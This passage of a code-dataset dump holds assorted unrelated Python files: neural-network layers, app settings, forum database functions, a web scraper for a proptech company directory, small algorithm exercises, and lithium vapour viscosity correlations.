n_out)),\n\t\t\t\t\thigh=numpy.sqrt(6. 
/ (n_in + n_out)),\n\t\t\t\t\tsize=(n_in, n_out)\n\t\t\t\t),\n\t\t\t\tdtype=theano.config.floatX\n\t\t\t)\n\t\t\t# multiple W-values by 4 if it's the sigmoid function\n\t\t\tif activation == theano.tensor.nnet.sigmoid:\n\t\t\t\tweight_values *= 4\n\t\t\telif activation == None:\n\t\t\t\tweight_values *= 0\n\n\t\t\tweight = theano.shared(value=weight_values, name='weight', borrow=True)\n\n\t\tif bias is None:\n\t\t\tbias_values = numpy.zeros((n_out,), dtype=theano.config.floatX)\n\t\t\tbias = theano.shared(value=bias_values, name='bias', borrow=True)\n\n\t\tself.weight = weight\n\t\tself.bias = bias\n\n\t\t# if (self.parent != None):\n\t\t# \tlin_output = T.dot(self.parent.getOutput(state_action), self.weight) + self.bias\n\t\t# else:\n\t\t# \tlin_output = T.dot(state_action, self.weight) + self.bias\n\t\t# self.output = (\n\t\t# \tlin_output if activation is None\t# if no activation function, output is linear weight*input + bias\n\t\t# \telse activation(lin_output)\t\t# otherwise use the activation function\n\t\t# )\n\t\t# parameters of the model\n\t\tself.params = [self.weight, self.bias]\n\n\tdef getOutput(self, state_action):\n\t\tif (self.parent != None):\n\t\t\tlin_output = T.dot(self.parent.getOutput(state_action), self.weight) + self.bias\n\t\telse:\n\t\t\tlin_output = T.dot(state_action, self.weight) + self.bias\n\n\t\treturn lin_output if self.activation is None else self.activation(lin_output)\n","sub_path":"src/q_learning/src/q_learning/neural_network/nn_layer/NNLayer.py","file_name":"NNLayer.py","file_ext":"py","file_size_in_byte":2894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"89651322","text":"from typing import *\n\nimport torch\nfrom torch import nn\n\nfrom torchlearn.utils import default_device\n\n\nclass MLP(nn.Module):\n \"\"\"Multi-layer perceptron model\"\"\"\n\n def __init__(self, input_dim: int, hidden_dims: List[int]=None, output_dim: int=1, device: str=default_device()):\n super(MLP, self).__init__()\n self.inp_dim = input_dim\n self.hidden_dims = hidden_dims\n self.outp_dim = output_dim\n self.device = device\n\n if not hidden_dims:\n raise AttributeError(f'Invalid value of hidden_dims = {hidden_dims}, must contain at least one dimension!')\n\n self.inp_layer = nn.Linear(in_features=input_dim, out_features=hidden_dims[0])\n\n self.hidden_layers_ = nn.ModuleList()\n for inp_dim, outp_dim in zip(self.hidden_dims[:-1], self.hidden_dims[1:]):\n layer = nn.Linear(in_features=inp_dim, out_features=outp_dim)\n nn.init.xavier_uniform_(layer.weight)\n self.hidden_layers_.append(layer)\n\n self.outp_layer = nn.Linear(in_features=hidden_dims[-1], out_features=output_dim)\n\n self.dropout_ = nn.ModuleList()\n self.batch_norm_ = nn.ModuleList()\n self.batch_norm_.append(nn.BatchNorm1d(num_features=self.inp_layer.out_features))\n for layer in self.hidden_layers_:\n self.dropout_.append(nn.Dropout(p=0.2))\n self.batch_norm_.append(nn.BatchNorm1d(num_features=layer.out_features))\n\n self.activation_ = nn.ReLU()\n self.prediction_ = nn.Softmax() if output_dim > 1 else nn.Sigmoid()\n\n if self.device == 'cuda':\n self.inp_layer = self.inp_layer.cuda()\n self.hidden_layers_ = self.hidden_layers_.cuda()\n self.outp_layer = self.outp_layer.cuda()\n self.batch_norm_ = self.batch_norm_.cuda()\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n \"\"\"Estimate probability of x\"\"\"\n x = self.inp_layer(x)\n if x.shape[0] > 1:\n x = self.batch_norm_[0](x)\n for hidden, dropout, batch_norm in zip(self.hidden_layers_, 
self.dropout_, self.batch_norm_[1:]):\n x = dropout(self.activation_((hidden(x))))\n if x.shape[0] > 1:\n x = batch_norm(x)\n y = self.prediction_(self.outp_layer(x))\n return y\n","sub_path":"torchlearn/model/mlp.py","file_name":"mlp.py","file_ext":"py","file_size_in_byte":2290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"130401572","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Date : 2014-06-17 23:01:35\n# @Author : shitao.tommy (hero007asd@gmail.com)\n# @Link : http://example.org\n# @Version : $Id$\n\nDEBUG = True\nGZIP = True\n\n# SITE_WWW = 'http://www.iarlink.com:7000/'\n# SITE_STATIC = 'http://www.eyuanonline.com:7000/static/'\n# DOMAIN = '.eyuanonline.com'\n\n\n# DB_HOST= 'localhost'\n# DB_PORT= 3306\n# DB_USER = 'root'\n# DB_PASSWD = 'password'\n# DB_NAME = 'database'\n\n\n# REDIS_HOST= 'localhost'\n# REDIS_PORT= 3306\n# REDIS_USER = 'root'\n# REDIS_PASSWD = 'password'\n# REDIS_NAME = 'database'\n\nMEMCACHE_HOST = 'localhost:11211'\n\nADMIN_PAGESIZE = 20\n\n\nWEIBO_KEY = ''\nWEIBO_SECRET = ''\nWEIBO_REDIRECT = 'http://www.xxx.com/oauth/weibo'\n\nALIPAY_KEY = ''\nALIPAY_INPUT_CHARSET = 'utf-8'\nALIPAY_PARTNER = ''\nALIPAY_SELLER_EMAIL = ''\nALIPAY_SIGN_TYPE = 'MD5'\nALIPAY_AUTH_URL='http://www.xxx.com/oauth/alipay_return'\nALIPAY_RETURN_URL='http://www.xxx.com/alipay/return'\nALIPAY_NOTIFY_URL='http://www.xxx.com/alipay/notify'\nALIPAY_SHOW_URL=''\nALIPAY_TRANSPORT='https'\n\nSMS_KEY = 0\nSMS_SECRET = ''\nSMS_GATEWAY = 'http://sms.bechtech.cn/Api/send/data/json'\n\n# Queue、gearman、\n\n# Redis\n\n# Sentry\n\n# log\nLOG_PATH = '../log/'\nLOG_NAME = 'tornado_log'\nACCESS_LOG = 'access'\nAPI_LOG = 'api'\nSQL_LOG = 'sql'\nERR_LOG = 'error'\n\n#upload\nUPLOAD_PATH = '../upload/'\n\n#mail\n# MAIL_HOST = 'smtp.qq.com'\n# MAIL_USER = '417732702'\n# MAIL_PASS = 'hero007asd@163.com'\n# MAIL_POSTFIX = 'qq.com'","sub_path":"src/conf/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"278773170","text":"import DBService\nfrom forums_API.dataService.functions import create_JSON, tuple2list\n\n\ndef save_user(email, username, about, name, optional):\n isAnonymous = 0\n if \"isAnonymous\" in optional:\n isAnonymous = optional[\"isAnonymous\"]\n id = DBService.exec_update('INSERT INTO Users (email, about, name, username, isAnonymous) VALUES (%s, %s, %s, %s, %s)',\n (email, about, name, username, isAnonymous, ))\n return create_JSON(\"user\", [about, email, id, isAnonymous, name, username])\n\n# Users.email\ndef update_user(email, about, name):\n db = DBService.get_connection()\n con = db[\"con\"]\n cursor = db[\"cursor\"]\n con.begin()\n cursor.execute('UPDATE Users SET about = %s, name = %s WHERE email = %s',\n (about, name, email, ))\n con.commit()\n user = details_with_cursor(cursor, email)\n DBService.close_connection(db[\"con\"], db[\"cursor\"])\n return user\n\n# Followers.followee/follower, Subscriptions.user_id, Users.email, Users.id, Users.(email, id)\ndef details(email):\n db = DBService.get_connection()\n\n user = details_with_cursor(db[\"cursor\"], email)\n\n DBService.close_connection(db[\"con\"], db[\"cursor\"])\n return user\n\n\n#-----------------------------------------------------------------------------------------------------------\n\n\ndef user_describe(user):\n user_response = {\n 'about': user[1],\n 'email': user[0],\n 'id': user[3],\n 'isAnonymous': bool(user[2]),\n 'name': 
user[4],\n 'username': user[5]\n }\n return user_response\n\n\ndef get_userID_by_email(cursor, email):\n cursor.execute(\"SELECT id FROM Users WHERE email = %s\", (email, ))\n result = cursor.fetchall()\n return result[0][0]\n\n\ndef details_with_cursor(cursor, email):\n if type(email) is not int and type(email) is not long:\n cursor.execute(\"SELECT id FROM Users WHERE email = %s\", (email, ))\n result = cursor.fetchall()\n id = result[0][0]\n else:\n id = email\n\n query = 'select email, about, isAnonymous, Users.id, name, username, ' \\\n 'group_concat(distinct thread) ' \\\n 'FROM Users JOIN Subscriptions ON Users.id = Subscriptions.user_id ' \\\n 'where id = %s'\n cursor.execute(query, (id, ))\n result = cursor.fetchall()\n\n user = user_describe(result[0])\n user[\"subscriptions\"] = []\n if result[0][6] is not None:\n user[\"subscriptions\"] = map(int, result[0][6].split(','))\n\n followers = 'SELECT email FROM Users JOIN Followers ON Users.id = follower ' \\\n 'WHERE followee = %s'\n cursor.execute(followers, (id, ))\n result = cursor.fetchall()\n user[\"followers\"] = tuple2list(result)\n\n following = 'SELECT email FROM Users JOIN Followers ON Users.id = followee ' \\\n 'WHERE follower = %s'\n cursor.execute(following, (id, ))\n result = cursor.fetchall()\n user[\"following\"] = tuple2list(result)\n return user","sub_path":"forums_API/dataService/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":2955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"216330708","text":"def count_boolean(b1, b2, b3) :\n a = [b1, b2, b3]\n count = 0\n i = 0\n for i in a :\n if i == \"True\" :\n count += 1\n i += 1\n if count >= 2:\n return True\n else :\n return False\n","sub_path":"BooleanCount.py","file_name":"BooleanCount.py","file_ext":"py","file_size_in_byte":228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"48833042","text":"#!/usr/bin/python3\nimport sys, getopt\nfrom csv_libPlot_Profile import *\n\ndef main(argv) :\n\n # PATHS\n ###########\n\n HOME = \"/Users/Arthur/\"\n PATH = HOME + \"Documents/UPMC/These/Codes/multilayerSingle/example/Well-Balance/Asymptotic/Womersley/\"\n PATHWB = HOME + \"Documents/UPMC/These/Codes/multilayer/example/Well-Balance/Asymptotic/Womersley/\"\n\n\n PATHWOM_20 = HOME + \"Documents/UPMC/These/Codes/multilayer/example/Well-Balance/Asymptotic/Womersley/Womersley/a=20/\"\n PATHWOM_15 = HOME + \"Documents/UPMC/These/Codes/multilayer/example/Well-Balance/Asymptotic/Womersley/Womersley/a=15/\"\n PATHWOM_10 = HOME + \"Documents/UPMC/These/Codes/multilayer/example/Well-Balance/Asymptotic/Womersley/Womersley/a=10/\"\n PATHWOM_5 = HOME + \"Documents/UPMC/These/Codes/multilayer/example/Well-Balance/Asymptotic/Womersley/Womersley/a=5/\"\n\n # FILE :\n ###########\n dataName = \"Artery_0_t_r_Ux.csv\"\n\n nfig = 1\n\n dRstr = \"1e-3\"\n\n for Womstr in [\"5\", \"20\"] :\n\n #Choose Womersley number\n if (Womstr == \"5\") :\n PATHWOM = PATHWOM_5\n elif (Womstr == \"10\") :\n PATHWOM = PATHWOM_10\n elif (Womstr == \"15\") :\n PATHWOM = PATHWOM_15\n elif (Womstr == \"20\") :\n PATHWOM = PATHWOM_20\n\n J = \"1600\"\n La = \"128\"\n\n Wom = PATH + \"T_12/\" +\"a=\"+str(Womstr) + \"/\" + \"K=1.e4/\" + \"dR=\" + dRstr + \"/L=\" + str(La) + \"/Raf=0/J=\" +str(J) + \"/\" + \"HRQ/Order=1/KIN_HAT/Figures/\" + dataName\n WomWB = PATHWB + \"T_12/\" +\"a=\"+str(Womstr) + \"/\" + \"K=1.e4/\" + \"dR=\" + dRstr + \"/L=\" + str(La) + \"/Raf=0/J=\" +str(J) + 
\"/\" + \"HRQ/Order=1/KIN_HAT/Figures/\" + dataName\n\n # ANALYTIC\n ##########\n\n ANA = PATHWOM+\"womProfil.csv\"\n\n # PLOTING :\n ###########\n\n Store = PATH + \"T_12/\" +\"a=\"+str(Womstr)+\"/Figures/\"\n\n\n lCol = [\n \"black\",\"green\",\"blue\",\"red\",\n \"black\",\"green\",\"blue\",\"red\",\n \"black\",\"green\",\"blue\",\"red\"\n ]\n lMark = [\n \"\",\"\",\"\",\"\",\n \"o\",\"o\",\"o\",\"o\",\n \"^\",\"^\",\"^\",\"^\"\n ]\n lMarkSize = [\n 1,1,1,1,\n 7,7,7,7,\n 7,7,7,7\n ]\n lMarkWidth = [\n 1,1,1,1,\n 1,1,1,1,\n 1,1,1,1\n ]\n MarkPoints = 45\n lLineSize = [\n 2,2,2,2,\n 1,1,1,1,\n 1,1,1,1\n ]\n lStyle = [\n \"-\",\"-\",\"-\",\"-\",\n \"\",\"\",\"\",\"\",\n \"\",\"\",\"\",\"\"\n ]\n\n lAlpha = [\n 1,1,1,1,\n 0.7,0.7,0.7,0.7,\n 0.7,0.7,0.7,0.7\n ]\n\n liX = [\n 1,2,3,4,\n 1,2,3,4,\n 1,2,3,4\n ]\n\n liY= [\n 0,0,0,0,\n 0,0,0,0,\n 0,0,0,0\n ]\n\n xLabel=r\"$U_x$ ($\\frac{cm}{s}$)\"\n yLabel = r\"$\\frac{r}{R}$\"\n\n lTextPos = [[0.02,0.05],[0.53,0.05],[0.64,0.05],[0.72,0.05],[0.8,0.05],[0.88,0.05],[0.96,0.05]]\n lText = [r\"$N$=$1600$, $L$=$128$\",r\"$t$=[\",r\"0.2,\",r\"0.4,\",r\"0.5,\",\"0.7\",r\"]$T$\"]\n lTextAlign = [\"left\",\"left\",\"center\",\"center\",\"center\",\"center\",\"right\"]\n lTextColor = [\"black\",\"black\",\"black\",\"green\",\"blue\",\"red\",\"black\"]\n LegPos = 12\n lLabel = [\n r\"$Analylic$\",\"\",\"\",\"\",\n r\"$Single$\",\"\",\"\",\"\",\n r\"$WB$\",\"\",\"\",\"\"\n ]\n\n title = \"Prof_Ux_Wom_\"+str(Womstr) + \"_O1_x_25_J_\"+str(J)+\".pdf\"\n lFile = [\n ANA,ANA,ANA,ANA,\n Wom,Wom,Wom,Wom,\n WomWB,WomWB,WomWB,WomWB\n ]\n\n nfig = plot_csv_Profile(\n pathStore=Store,title=title,lFile=lFile,\n liX=liX,liY=liY,\n xLabel=xLabel,yLabel=yLabel,lLabel=lLabel,LegPos=LegPos,\n lText=lText,lTextPos=lTextPos,lTextAlign=lTextAlign,lTextColor=lTextColor,\n lCol=lCol,lMark=lMark,\n lMarkSize=lMarkSize,lMarkWidth=lMarkWidth,MarkPoints=MarkPoints,\n lLineSize=lLineSize,lStyle=lStyle,lAlpha=lAlpha,nf=nfig)\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","sub_path":"multilayer-Single/scripts/Asymptotic/Womersley/validationProfile.py","file_name":"validationProfile.py","file_ext":"py","file_size_in_byte":4806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"311156222","text":"class Point:\n ''' The \"__init__(self,*other)\" function initializes all variables\n that will be used in the class, it essentially makes the object '''\n def __init__(self,x=0,y=0):\n self.x = x\n self.y = y\n ''' When we print an instance of this class, we get a messy format of the\n form \"<__main__.Point object at 0x00000000031F8CC0>\" which is not helpful\n and so we can write a special function that will indicate how we want\n to print the instance '''\n def __str__(self):\n return \"({0},{1})\".format(self.x,self.y)\n ''' Now there are special features you can give objects, such as when ever\n you add or multply two objects of the same class, the object has a special\n built in function that says what to do, which makes writing codes easier.\n There are a bunch of these \"Overload\" functions you can look up. 
They all\n start with a \"__\" and end with a \"__\" like the __init__ and __str__ functions.'''\n def __add__(self,other):\n x = self.x + other.x\n y = self.y + other.y\n return Point(x,y)\n def __mul__(self,other):\n x = self.x * other.x\n y = self.y * other.y\n return Point(x,y)\n \n \n\n\n# Create the Point object called p1\np1 = Point(1,3)\np2 = Point(1,1)\n# Print in the format we have designed\nprint(p1)\nprint(p2)\n# Use the \"__add__\" function\np3 = p1 + p2\nprint(p3)\n# Use the \"__mul__\" function\np4 = p1 * p2\nprint(p4)\n\n\n\n","sub_path":"Classes.py","file_name":"Classes.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"522357645","text":"# https://codeforces.com/problemset/problem/1221/D\n\n\ndef helper(h1, h2, h3, a, b, c, h):\n mini = 2 * (10 ** 18)\n if h1 != h:\n mini = min(mini, a)\n if h2 != h:\n mini = min(mini, b)\n if h3 != h:\n mini = min(mini, c)\n return mini\n\n\ndef great_fence_cost(n, h, p):\n a = 0\n b = p[0]\n c = p[0] * 2\n for i in range(1, n):\n a_new = helper(h[i - 1], h[i - 1] + 1, h[i - 1] + 2, a, b, c, h[i]) + 0\n b_new = helper(h[i - 1], h[i - 1] + 1, h[i - 1] + 2, a, b, c, h[i] + 1) + p[i] * 1\n c_new = helper(h[i - 1], h[i - 1] + 1, h[i - 1] + 2, a, b, c, h[i] + 2) + p[i] * 2\n a = a_new\n b = b_new\n c = c_new\n return min(a, b, c)\n\n\ndef solve():\n query_number = int(input())\n for k in range(query_number):\n n = int(input())\n h = [0] * n\n p = [0] * n\n for j in range(n):\n h[j], p[j] = list(map(int, input().split(\" \")))\n print(great_fence_cost(n, h, p))\n\n\nif __name__ == '__main__':\n solve()\n","sub_path":"crackinginterview-source/algo/codeforces/ecr73/d_make_fence_great_again/d_make_fence_great_againV3.py","file_name":"d_make_fence_great_againV3.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"17893878","text":"#Lowest Common Ancestor of a Binary Search Tree\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def lowestCommonAncestor(self, root, p, q):\n node = root\n while node:\n parent = node\n if p.val > parent.val and q.val > parent.val:\n node = root.left\n elif p.val < parent.val and q.val < parent.val:\n node = root.right\n else:\n return node\n\nclass Solution:\n\n def lowestCommonAncestor(self, root, p, q):\n if p.val > root.val and q.val > root.val:\n return self.lowestCommonAncestor(root.right, p, q)\n elif p.val < root.val and q.val < root.val:\n return self.lowestCommonAncestor(root.left, p, q)\n else:\n return root","sub_path":"trees/lca_bst.py","file_name":"lca_bst.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"282747543","text":"import pandas\nimport requests\nimport time\nimport xlsxwriter\nfrom selenium import webdriver\nfrom selenium.common.exceptions import NoSuchElementException\n# from selenium.webdriver.chrome.options import Options\n\n\n# initialize webdriver\ndriver = webdriver.Safari()\ndriver.implicitly_wait(10)\n\n\"\"\"\nchrome_options = Options()\nchrome_options.add_argument(\"--headless\")\n\ndriver = webdriver.Chrome(options = chrome_options)\n\"\"\"\n\n\n# load unissu main page\ndef open_main_page():\n url = \"https://www.unissu.com/proptech-companies\"\n driver.get(url)\n 
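# The implicit wait set above makes this lookup poll until the <title>\n    # element is present; an explicit WebDriverWait would be a more targeted\n    # (hypothetical) alternative.\n    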
driver.find_element_by_css_selector(\"title\")\n\n\n# close pop-up if necessary\ndef close_popup():\n try:\n modal = driver.find_element_by_css_selector(\"div[class*='modalClose']\")\n modal.click()\n except NoSuchElementException:\n pass\n\n\n# load all companies\ndef load_companies():\n while True:\n try:\n load_more = driver.find_element_by_css_selector(\".loadMoreButton button\")\n load_more.click()\n except NoSuchElementException:\n return\n\n\n# get links of all companies' profiles from main page\ndef get_companies_links():\n companies = []\n company_elems = driver.find_elements_by_css_selector(\".results-container .company-box a\")\n for company_link in company_elems:\n company = company_link.get_attribute(\"href\")\n companies.append(company)\n return companies\n\n\n# load each company's profile\ndef open_company_profile(unissu_url):\n driver.get(unissu_url)\n driver.find_element_by_css_selector(\".company-info\")\n\n\n# get company's name\ndef get_company_name():\n name_elem = driver.find_element_by_css_selector(\".company-name\")\n driver.execute_script(\"arguments[0].scrollIntoView(true);\", name_elem)\n time.sleep(1)\n return name_elem.text\n\n\n# get company's tags\n# accounting for the possibility of multiple tags or no tags\ndef get_company_tags():\n tags = ''\n try:\n more_tag = driver.find_element_by_css_selector(\".tags-row span[class*='green-tag']\")\n more_tag.click()\n time.sleep(1)\n except NoSuchElementException:\n pass\n\n tag_elems = driver.find_elements_by_css_selector(\".tags-row span\")\n if len(tag_elems) != 0:\n for tag in tag_elems[:-1]:\n tags += tag.text + \", \"\n if tag_elems[-1].text != 'Show Less':\n tags += tag_elems[-1].text\n else:\n tags = tags[:-2]\n return tags\n\n\n# get company's description\ndef get_company_description():\n return driver.find_element_by_css_selector(\".description\").text\n\n\n# get company's website\ndef get_company_website():\n return driver.find_element_by_css_selector(\"div[class*='websiteLink'] a\").get_attribute(\"href\")\n\n\n# get company's linkedin \n# accounting for the possibility of company not having linkedin profile\ndef get_company_linkedin():\n linkedin = '-'\n try:\n linkedin_link = driver.find_element_by_xpath(\"//img[@alt='linkedin']/parent::a\")\n linkedin = linkedin_link.get_attribute(\"href\")\n except NoSuchElementException:\n pass\n return linkedin\n\n\n# go to each company's unissu profile\n# get name, tags, description, website, and linkedin\ndef get_companies_information():\n companies = get_companies_links()\n\n # create dataframe object to write to excel\n keys = [\"Name\", \"Unissu URL\", \"Tags\", \"Description\", \"Website\", \"Linkedin\"]\n data = dict.fromkeys(keys, [])\n dataframe = pandas.DataFrame(data)\n dataframe.to_excel(\"companies.xlsx\", index = False, engine = \"xlsxwriter\")\n\n # get company's information from company's profile\n for company in companies:\n unissu_url = company\n open_company_profile(unissu_url)\n\n tags = get_company_tags()\n name = get_company_name()\n description = get_company_description()\n website = get_company_website()\n linkedin = get_company_linkedin()\n\n # store all info into company's profile\n company_data = dict.fromkeys(keys, '')\n company_data[\"Name\"] = name\n company_data[\"Unissu URL\"] = unissu_url\n company_data[\"Tags\"] = tags\n company_data[\"Description\"] = description\n company_data[\"Website\"] = website\n company_data[\"Linkedin\"] = linkedin\n\n # write to excel\n dataframe = dataframe.append(company_data, ignore_index = True)\n 
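# Rewriting the workbook on every iteration keeps partial results on disk.\n        # Note: DataFrame.append was removed in pandas 2.x; under a newer pandas\n        # this would need pd.concat([dataframe, pd.DataFrame([company_data])]).\n        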
dataframe.to_excel(\"companies.xlsx\", index = False, engine = \"xlsxwriter\")\n\n\nif __name__ == \"__main__\":\n open_main_page()\n close_popup()\n load_companies()\n get_companies_information()\n driver.close()\n\n","sub_path":"proptech.py","file_name":"proptech.py","file_ext":"py","file_size_in_byte":4538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"587771643","text":"import numpy as np\nfrom numpy import sqrt, log, exp, pi\nfrom scipy.interpolate import interp1d\nfrom lithdata.vaporpressure import press_best\n\ndef eta1_Vargaftik_and_Yargin(TK):\n \"\"\"\n Viscosity of the monomers as a function of temperature.\n \n Vargaftik, N B, and V S Yargin. \n Ch 7.4: Thermal Conductivity and Viscosity of the Gaseous Phase.\n Handbook of Thermodynamic and Transport Properties of Alkali Metals,\n edited by R. W. Ohse, 45. Blackwell Scientific Publications, 1985.\n\n Equation (56), page 821.\"\"\"\n eta1 = 1e-7 * (130.6 + 0.1014 * (TK - 1000) - 4.55e-6 * (TK - 1000)**2)\n return eta1\n\ndef eta1_Vargaftik_and_Yargin_error(TK):\n \"\"\"\n \"Errors in the viscosity and thermal conductivity factors for \n the lithium vapour atomic component, due to inaccuracy in \n calculating atom collision integrals, are equal on average \n to 3%, falling from 3.8% to 1.5% with increase of the temperature\n from 700 to 2500 K. The portion of the error which is determined \n by inaccuracy in establishing the value of $\\beta^2_{12}$ is \n changed with the concentration of the molecular component, reaching \n its maximum at the saturation line. In the case of viscosity it is \n 1 - 6 %, and for thermal conductivity it is 4 - 8 % (for T <= 2000 K)\"\n \"\"\"\n x1, y1 = (700, 3.8)\n x2, y2 = (2500, 1.5)\n return y1 + (y2 - y1) * (TK - x1)/(x2 - x1)\n\ndef eta_Vargaftik_and_Yargin(x2, TK):\n \"\"\"Viscosity with two components, monomer and dimer.\n Equation (55), page 821.\n $$ \\eta(x_2, T) = \\eta_1(T) \\left(1 - 3.65 x_2 \n + 12.5 x_2^2 - 42 x_2^3 \n + 142 x_2^4 - 479 x_2^5 \n + 1600 x_2^6\\right)$$\n \"\"\"\n eta1 = eta1_Vargaftik_and_Yargin(TK)\n eta = eta1 * (1 - 3.65 * x2 + 12.5 * x2**2\n - 42 * x2**3 + 142 * x2**4 \n - 479 * x2**5 + 1600 * x2**6)\n return eta\n\ndef eta_sat_Vargaftik_and_Yargin_Table():\n \"\"\"\n Table 36\n \"\"\"\n t = [700, 725, 750, 775, 800, 825, 850, 875, 900, 925, 950, 975,\n 1000, 1025, 1050, 1075, 1100, 1125, 1150, 1175, 1200,\n 1225, 1250, 1275, 1300, 1325, 1350, 1375, 1400, 1425,\n 1450, 1475, 1500, 1525, 1550, 1575, 1600, 1625, 1650,\n 1675, 1700, 1725, 1750, 1775, 1800, 1825, 1850, 1875,\n 1900, 1925, 1950, 1975, 2000]\n eta_sats = np.array([98.6, 100.9, 103.0, 105.0, 107.0, 108.9,\n 110.6, 112.3, 113.8, 115.3, 116.6, 117.8, 119.0,\n 120.0, 121.0, 121.9, 122.7, 123.4, 124.1, 124.7,\n 125.3, 125.8, 126.2, 126.7, 127.1, 127.4, 127.8,\n 128.1, 128.4, 128.7, 129.0, 129.3, 129.6, 129.9, \n 130.2, 130.5, 130.7, 131.0, 131.3, 131.7, 132.0,\n 132.3, 132.6, 133.0, 133.3, 133.7, 134.1, 134.4,\n 134.8, 135.2, 135.6, 136.0, 136.4])\n data = np.array([t, 1.0e-7 * eta_sats]).T\n return data\n\ndef x2_concentration_Vargaftik_and_Yargin(P_kpa, Keq):\n \"\"\"Equation (80)\n \"\"\"\n x2 = 1 - 2/(1 + sqrt(1 + 3.9477e-2 * P_kpa / Keq))\n return x2\n\ndef phi_V_and_Y(component, T):\n \"\"\"\n Vargaftik, N B, and V S Yargin. \n Ch 7.4: Thermal Conductivity and Viscosity of the Gaseous Phase.\n Handbook of Thermodynamic and Transport Properties of Alkali Metals,\n edited by R. W. Ohse, 45. 
Blackwell Scientific Publications, 1985.\n\n $\\phi^*$ from the coefficients in Table 35, page 823.\n \"\"\"\n x = 1e-4 * T \n # functions = [1, log(x), 10^-4 x^-2, 10^-2 x^-1, x, x^2, x^3]\n table = [[187.7374, 19.5189, 4.7730, -6.117, 10.9728, -21.055, 21.357],\n [284.3545, 35.8511, -7.180, 17.819, 35.8331, -73.097, 46.625]]\n t = table[component - 1]\n phi = (t[0] + t[1] * log(x) \n + t[2] * 1e-4 * x**(-2)\n + t[3] * 1e-2 * x**(-1)\n + t[4] * x\n + t[5] * x**2\n + t[6] * x**3)\n return phi\n\ndef K_eq_Vargaftik_and_Yargin(T_gas, d_0_0=107800):\n \"\"\"\n Vargaftik, N B, and V S Yargin. \n Ch 7.4: Thermal Conductivity and Viscosity of the Gaseous Phase.\n Handbook of Thermodynamic and Transport Properties of Alkali Metals,\n edited by R. W. Ohse, 45. Blackwell Scientific Publications, 1985.\n\n $\\phi^*$ from the coefficients in Table 35, page 823.\n \"\"\"\n R_gas = 8.31446\n phi1 = phi_V_and_Y(1, T_gas)\n phi2 = phi_V_and_Y(2, T_gas)\n K_eq = exp((2 * phi1 - phi2)/R_gas - d_0_0 / (R_gas * T_gas))\n return K_eq\n\n# Vargaftik and Voljak table\ndef x2_concentration_Vargaftik_and_Voljak(TK):\n data_T = [800, 850, 900, 1000, 1100, 1200, 1500, 1800, 2000]\n data_x2 = [0.007953, 0.01134, 0.0155, 0.02596, 0.03894, 0.05383, 0.1035, 0.1505, 0.1767]\n interp = interp1d(data_T, data_x2, kind='cubic', bounds_error=False)\n x_2 = interp(TK)\n return x_2\n\ndef eta1_Vargaftik_1991_Eq_6(TK):\n \"\"\"Linear fit to monomer viscosity\n \n Equation (6) of\n Vargaftik, N. B., Yu. K. Vinogradov, V. I. Dolgov, V. G. Dzis,\n I. F. Stepanenko, Yu. K. Yakimovich, and V. S. Yargin.\n \"Viscosity and Thermal Conductivity of Alkali Metal Vapors at \n Temperatures up to 2000 K.\" International Journal of \n Thermophysics 12, no. 1 (January 1991): 85–103.\n https://doi.org/10.1007/BF00506124.\n \"\"\"\n return (129.1 + 0.100 * (TK - 1000)) * 1e-7\n\ndef eta_Vargaftik_1991_Eq_4(x2, TK):\n \"\"\"\n Viscosity as a function of x2 and temperature\n\n Vargaftik, N. B., Yu. K. Vinogradov, V. I. Dolgov, V. G. Dzis,\n I. F. Stepanenko, Yu. K. Yakimovich, and V. S. Yargin.\n \"Viscosity and Thermal Conductivity of Alkali Metal Vapors at \n Temperatures up to 2000 K.\" International Journal of \n Thermophysics 12, no. 1 (January 1991): 85–103.\n https://doi.org/10.1007/BF00506124.\n \"\"\"\n b1, b2, b3, b4 = 4.094, 3.335, 0.864, -6.964e-2\n numerator = 1 + b3 * x2 + b4 * x2**2\n denominator = 1 + b1 * x2 + b2 * x2**2\n eta = eta1_Vargaftik_1991_Eq_6(TK) * numerator / denominator\n return eta\n\ndef extrapolation_of_V_91_low_pressure(TK):\n Keq = K_eq_Vargaftik_and_Yargin(TK)\n P_kpa = press_best(TK) / 1000\n x2 = x2_concentration_Vargaftik_and_Yargin(P_kpa, Keq)\n eta_sat = eta_Vargaftik_1991_Eq_4(x2, TK)\n return eta_sat\n\ndef eta1_Vargaftik_1991_Table(TK):\n \"\"\"\n Monomer viscosity\n\n Vargaftik, N. B., Yu. K. Vinogradov, V. I. Dolgov, V. G. Dzis,\n I. F. Stepanenko, Yu. K. Yakimovich, and V. S. Yargin.\n \"Viscosity and Thermal Conductivity of Alkali Metal Vapors at \n Temperatures up to 2000 K.\" International Journal of \n Thermophysics 12, no. 
